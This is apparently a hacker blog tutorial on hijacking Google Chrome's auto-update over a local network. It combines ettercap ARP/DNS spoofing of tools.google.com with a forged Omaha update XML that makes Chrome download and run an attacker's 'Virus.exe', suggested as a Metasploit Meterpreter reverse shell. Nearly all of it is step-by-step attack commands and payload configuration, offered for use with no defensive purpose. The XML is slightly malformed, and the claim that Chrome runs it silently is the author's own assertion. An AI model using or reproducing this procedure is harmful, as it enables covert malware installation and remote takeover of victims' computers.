Well, I have to hand it to those genius’s… This one is quite interesting. Here, we are going to take a look at a Man in the Middle where DNS poisoning is used to masquerade as the Google Chrome Update Server. So, Google Chrome looks for an update EXE and then the hacker feeds them a malevolent EXE. Apparently Google Chrome swallows it whole and just runs the darn thing.
Prerequisites:
- Apache and ettercap
OR - Kali Linux
Givens:
IP 111.111.111.111 is the Attacker
IP 222.222.222.22X are the Victims
Let’s begin:
Google Chrome has a great little auto-update feature that runs every 15 minutes or so and downloads and runs an update [EXE]. By tricking the victim’s computer into thinking the Attack Computer is the update server, you can make anyone running Chrome on the network run the Malevolent EXE silently.
Let’s start off with the basic background knowledge. The hacker will to need to DNS poison the network and tell all computers that they are the update server.
(Please note, commands are done as if running Kali)
Shell:
find etter.dns
Copy the path to etter.dns (highlight, then ctrl+shift+C) and then run
nano /path/to/etter.dns
You will be presented with the edittable DNS file.
You want to add an entry of
“tools.google.com A 111.111.111.111
*tools.google.com A 111.111.111.111
www.tools.google.com A 111.111.111.111
ctrl+X and then SAVE.
Now, lets set up our server to serve out Virus.exe:
Direct all requests to your server to the following XML document we will make.
(For more info on the XML format, see Google’s Omaha Server Protocol v3)
First we need to gather our info.
Are we hitting 32-bit chrome, or 64-bit?
Most people are 64-bit these days, 64-bit means that for this example I’ll be doing 64-bit
appid=”4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D”
(you can easily grab the ID for 32-bit with Wireshark)
Now, we have our Virus.exe (easily make a reverse meterpreter EXE with Metasploit?)
Take the Sha-1(base-64) hash of the Virus.exe
EX: VXriGUVI0TNqfLlU02vBel4Q3Zo=
Then we craft our XML to serve:
<?xml version=”1.0″ encoding=”UTF-8″?>
<response protocol=”3.0″ server=”prod”>
<daystart elapsed_seconds=”56508″/>
<app appid=”{4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D}” status=”ok”>
<updatecheck status=”ok”>
<urls>
<url codebase=”111.111.111.111″/>
</urls>
<packages>
<package hash=”VXriGUVI0TNqfLlU02vBel4Q3Zo=” name=”Virus.exe” required=”true” size=”2983″/>
</packages>
<actions>
<action arguments=”” event=”install” run=”Virus.exe”/>
</actions>
</manifest>
</updatecheck>
<ping status=”ok”/>
</app>
</response>
Host the XML in the root of your server along with Virus.exe
Then open ettercap and
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
And now anytime GC goes to update, it will grab your virus instead of the actual update.